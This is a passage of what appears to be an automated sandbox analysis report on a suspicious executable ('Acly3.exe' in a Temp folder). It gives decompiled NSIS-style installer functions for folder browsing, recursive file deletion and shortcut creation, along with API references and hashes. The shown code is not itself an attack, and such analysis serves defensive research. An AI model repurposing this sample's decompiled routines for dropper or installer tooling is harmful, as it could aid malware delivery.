                                                                            • GlobalLock.KERNEL32 ref: 00405A1C
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                            • SetClipboardData.USER32 ref: 00405A5B
                                                                            • CloseClipboard.USER32 ref: 00405A61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                            • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040498A, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                            0x0040498a
                                                                            0x00404990
                                                                            0x00404996
                                                                            0x004049a3
                                                                            0x004049b1
                                                                            0x004049b4
                                                                            0x004049bc
                                                                            0x004049c2
                                                                            0x004049c2
                                                                            0x004049ce
                                                                            0x004049d1
                                                                            0x00404a3f
                                                                            0x00404a46
                                                                            0x00404b1d
                                                                            0x00404b24
                                                                            0x00404b33
                                                                            0x00404b33
                                                                            0x00404b37
                                                                            0x00404b41
                                                                            0x00404b4e
                                                                            0x00404b50
                                                                            0x00404b50
                                                                            0x00404b5e
                                                                            0x00404b65
                                                                            0x00404b6c
                                                                            0x00404b6f
                                                                            0x00404bab
                                                                            0x00404bad
                                                                            0x00404bb3
                                                                            0x00404bb8
                                                                            0x00404bbc
                                                                            0x00404bbe
                                                                            0x00404bbe
                                                                            0x00404bda
                                                                            0x00000000
                                                                            0x00404bdc
                                                                            0x00404bdf
                                                                            0x00404bed
                                                                            0x00404bf3
                                                                            0x00404bf4
                                                                            0x00404bf7
                                                                            0x00404bfa
                                                                            0x00000000
                                                                            0x00404bfa
                                                                            0x00404b71
                                                                            0x00404b73
                                                                            0x00404b77
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404b79
                                                                            0x00404b79
                                                                            0x00404b86
                                                                            0x00404b8b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404b8f
                                                                            0x00404b91
                                                                            0x00404b91
                                                                            0x00404b9a
                                                                            0x00404b9c
                                                                            0x00404ba1
                                                                            0x00404ba4
                                                                            0x00404ba9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404ba9
                                                                            0x00404c06
                                                                            0x00404c10
                                                                            0x00404c13
                                                                            0x00404c16
                                                                            0x00404c1d
                                                                            0x00404c1d
                                                                            0x00404c1f
                                                                            0x00404c1f
                                                                            0x00404c24
                                                                            0x00404c26
                                                                            0x00404c2e
                                                                            0x00404c35
                                                                            0x00404c37
                                                                            0x00404c42
                                                                            0x00404c42
                                                                            0x00404c37
                                                                            0x00404c52
                                                                            0x00404c5c
                                                                            0x00404c64
                                                                            0x00404c7f
                                                                            0x00404c66
                                                                            0x00404c6f
                                                                            0x00404c6f
                                                                            0x00404c64
                                                                            0x00404c84
                                                                            0x00404c89
                                                                            0x00404c8e
                                                                            0x00404c97
                                                                            0x00404c97
                                                                            0x00404ca0
                                                                            0x00404ca2
                                                                            0x00404ca2
                                                                            0x00404cae
                                                                            0x00404cb6
                                                                            0x00404cc0
                                                                            0x00404cc0
                                                                            0x00404cc5
                                                                            0x00000000
                                                                            0x00404cc5
                                                                            0x00404b6f
                                                                            0x00404b26
                                                                            0x00404b2d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404b2d
                                                                            0x00404a4c
                                                                            0x00404a55
                                                                            0x00404a6f
                                                                            0x00404a74
                                                                            0x00404a7e
                                                                            0x00404a85
                                                                            0x00404a91
                                                                            0x00404a94
                                                                            0x00404a97
                                                                            0x00404a9e
                                                                            0x00404aa6
                                                                            0x00404aa9
                                                                            0x00404aad
                                                                            0x00404ab4
                                                                            0x00404abc
                                                                            0x00404b16
                                                                            0x00404abe
                                                                            0x00404abf
                                                                            0x00404ac6
                                                                            0x00404ad0
                                                                            0x00404ad8
                                                                            0x00404ae5
                                                                            0x00404af9
                                                                            0x00404afd
                                                                            0x00404afd
                                                                            0x00404af9
                                                                            0x00404b02
                                                                            0x00404b0f
                                                                            0x00404b0f
                                                                            0x00404abc
                                                                            0x00000000
                                                                            0x00404a74
                                                                            0x00404a62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404a68
                                                                            0x00000000
                                                                            0x004049d3
                                                                            0x004049e0
                                                                            0x004049e9
                                                                            0x004049f6
                                                                            0x004049f6
                                                                            0x004049fd
                                                                            0x00404a03
                                                                            0x00404a0c
                                                                            0x00404a0f
                                                                            0x00404a12
                                                                            0x00404a1a
                                                                            0x00404a1d
                                                                            0x00404a20
                                                                            0x00404a26
                                                                            0x00404a2d
                                                                            0x00404a34
                                                                            0x00404ccb
                                                                            0x00404cdd
                                                                            0x00404a3a
                                                                            0x00404a3d
                                                                            0x00000000
                                                                            0x00404a3d
                                                                            0x00404a34

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                            • SetWindowTextW.USER32 ref: 00404A03
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,0042D268,00000000,?,?), ref: 00404AF1
                                                                            • lstrcatW.KERNEL32 ref: 00404AFD
                                                                            • SetDlgItemTextW.USER32 ref: 00404B0F
                                                                              • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406827
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406836
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 0040683B
                                                                              • Part of subcall function 004067C4: CharPrevW.USER32(?,?), ref: 0040684E
                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                            • MulDiv.KERNEL32 ref: 00404BED
                                                                              • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                              • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                              • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                            • API String ID: 2624150263-3065053676
                                                                            • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                            • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405C49, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                            0x00405c53
                                                                            0x00405c58
                                                                            0x00405c61
                                                                            0x00405c64
                                                                            0x00405c6c
                                                                            0x00405c6f
                                                                            0x00405c72
                                                                            0x00405c7a
                                                                            0x00405c7c
                                                                            0x00405c7d
                                                                            0x00000000
                                                                            0x00405c7d
                                                                            0x00405c88
                                                                            0x00405c8b
                                                                            0x00405c8b
                                                                            0x00405c8b
                                                                            0x00405c8f
                                                                            0x00405ca2
                                                                            0x00405ca9
                                                                            0x00405cae
                                                                            0x00405cb2
                                                                            0x00405cc2
                                                                            0x00405cb4
                                                                            0x00405cba
                                                                            0x00405cba
                                                                            0x00405cc7
                                                                            0x00405ccb
                                                                            0x00405cd7
                                                                            0x00405cdd
                                                                            0x00405ce2
                                                                            0x00405ce8
                                                                            0x00405cf3
                                                                            0x00405cf9
                                                                            0x00405cfb
                                                                            0x00405cfe
                                                                            0x00405da8
                                                                            0x00405da8
                                                                            0x00405dac
                                                                            0x00405dae
                                                                            0x00405dae
                                                                            0x00405dae
                                                                            0x00405dae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d04
                                                                            0x00405d04
                                                                            0x00405d04
                                                                            0x00405d0c
                                                                            0x00405d2c
                                                                            0x00405d34
                                                                            0x00405d39
                                                                            0x00405d40
                                                                            0x00405d5b
                                                                            0x00405d60
                                                                            0x00405d62
                                                                            0x00405d86
                                                                            0x00405d64
                                                                            0x00405d64
                                                                            0x00405d67
                                                                            0x00405d7b
                                                                            0x00405d69
                                                                            0x00405d6c
                                                                            0x00405d74
                                                                            0x00405d74
                                                                            0x00405d67
                                                                            0x00405d42
                                                                            0x00405d48
                                                                            0x00405d4a
                                                                            0x00405d50
                                                                            0x00405d50
                                                                            0x00405d4a
                                                                            0x00000000
                                                                            0x00405d40
                                                                            0x00405d0e
                                                                            0x00405d16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d18
                                                                            0x00405d20
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d22
                                                                            0x00405d2a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d8b
                                                                            0x00405d93
                                                                            0x00405d99
                                                                            0x00405d99
                                                                            0x00405da2
                                                                            0x00000000
                                                                            0x00405da2
                                                                            0x00405ccd
                                                                            0x00405cd5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c91
                                                                            0x00405c91
                                                                            0x00405c93
                                                                            0x00405db3
                                                                            0x00405db5
                                                                            0x00405db8
                                                                            0x00405e09
                                                                            0x00405e09
                                                                            0x00405e09
                                                                            0x00405dba
                                                                            0x00405dbd
                                                                            0x00405dc8
                                                                            0x00405dcd
                                                                            0x00405dcf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405dd2
                                                                            0x00405dde
                                                                            0x00405de3
                                                                            0x00405de5
                                                                            0x00000000
                                                                            0x00405e00
                                                                            0x00405de7
                                                                            0x00405dea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405def
                                                                            0x00000000
                                                                            0x00405df6
                                                                            0x00405dbf
                                                                            0x00405dbf
                                                                            0x00000000
                                                                            0x00405dbf
                                                                            0x00405c99
                                                                            0x00405c9c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c9c

                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                            • lstrcatW.KERNEL32 ref: 00405CBA
                                                                            • lstrcatW.KERNEL32 ref: 00405CDD
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-2602864334
                                                                            • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                                                                            • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                            • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                                                                            • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004021AA, Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 67%
                                                                            			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                            0x004021b3
                                                                            0x004021bd
                                                                            0x004021c7
                                                                            0x004021d1
                                                                            0x004021dc
                                                                            0x004021df
                                                                            0x004021f9
                                                                            0x004021fc
                                                                            0x00402202
                                                                            0x00402205
                                                                            0x0040220f
                                                                            0x00402213
                                                                            0x00402213
                                                                            0x00402218
                                                                            0x00402229
                                                                            0x00402231
